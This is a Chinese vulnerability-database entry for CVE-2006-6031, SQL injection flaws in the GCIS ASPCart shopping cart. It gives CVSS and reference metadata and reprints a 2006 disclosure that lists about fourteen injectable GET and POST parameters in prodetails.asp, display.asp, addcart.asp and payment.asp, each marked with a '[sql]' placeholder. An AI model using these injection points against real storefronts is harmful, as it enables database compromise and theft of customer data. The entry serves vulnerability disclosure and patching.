ASPCart多个SQL 注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192810 漏洞类型 SQL注入
发布时间 2006-11-21 更新时间 2006-11-21
CVE编号 CVE-2006-6031 CNNVD-ID CNNVD-200611-355
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/87186
https://cxsecurity.com/issue/WLB-2006110102
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-355
|漏洞详情
GreaterCincinnatiInternetSolutions(GCIS)ASPCart存在多个SQL注入漏洞,远程攻击者可以通过在(a)prodetails.aspommands内的(1)prodid参数;在(b)display.asp内的(2)page参数;在(c)addcart.asp内的(3)custid,(4)item,(5)price,(6)custom,(7)department,(8)start,(9)quantity,(10)submit,(11)custom1,(12)custom2或(13)custom3参数;或者在(d)payment.asp内的(14)customerid参数,来执行任意SQL命令。
|漏洞EXP
vendor site: http://www.aspcart.com
product: ASP Cart 
bug: multiples injection sql post & get
global risk: high !

injection get :
http://site.com/prodetails.asp?prodid='[sql]

injection (post) :

1)http://site.com/display.asp 
Variables:
/display.asp?page='[sql]

2)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid='[sql]

3)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item='[sql]

4)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price='[sql]

5)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom='[sql]

6)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department='[sql]

7)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1289&s
tart='[sql]

8)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1
289&start=1&quantity='[sql]

9)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1
289&start=1&quantity=1&submit='[sql]

10)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1
289&start=1&quantity=1&submit=1&custom1='[sql]

11)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1
289&start=1&quantity=1&submit=1&custom1=1&custom2='[sql]

12)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1
289&start=1&quantity=1&submit=1&custom1=1&custom2=1&custom3='[sql]

12)http://site.com/payment.asp 
Variables:
/payment.asp?customerid='[sql]

laurent gaffi & benjamin moss
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com [email concealed]
|受影响的产品
Gcis Aspcart 0
|参考资料

来源:BUGTRAQ
名称:20061114ASPCart[multiplesinjectionsql(post&get)]
链接:http://www.securityfocus.com/archive/1/archive/1/451858/100/0/threaded
来源:BID
名称:21152
链接:http://www.securityfocus.com/bid/21152
来源:VUPEN
名称:ADV-2006-4580
链接:http://www.frsirt.com/english/advisories/2006/4580
来源:SREASON
名称:1899
链接:http://securityreason.com/securityalert/1899
来源:SECUNIA
名称:22946
链接:http://secunia.com/advisories/22946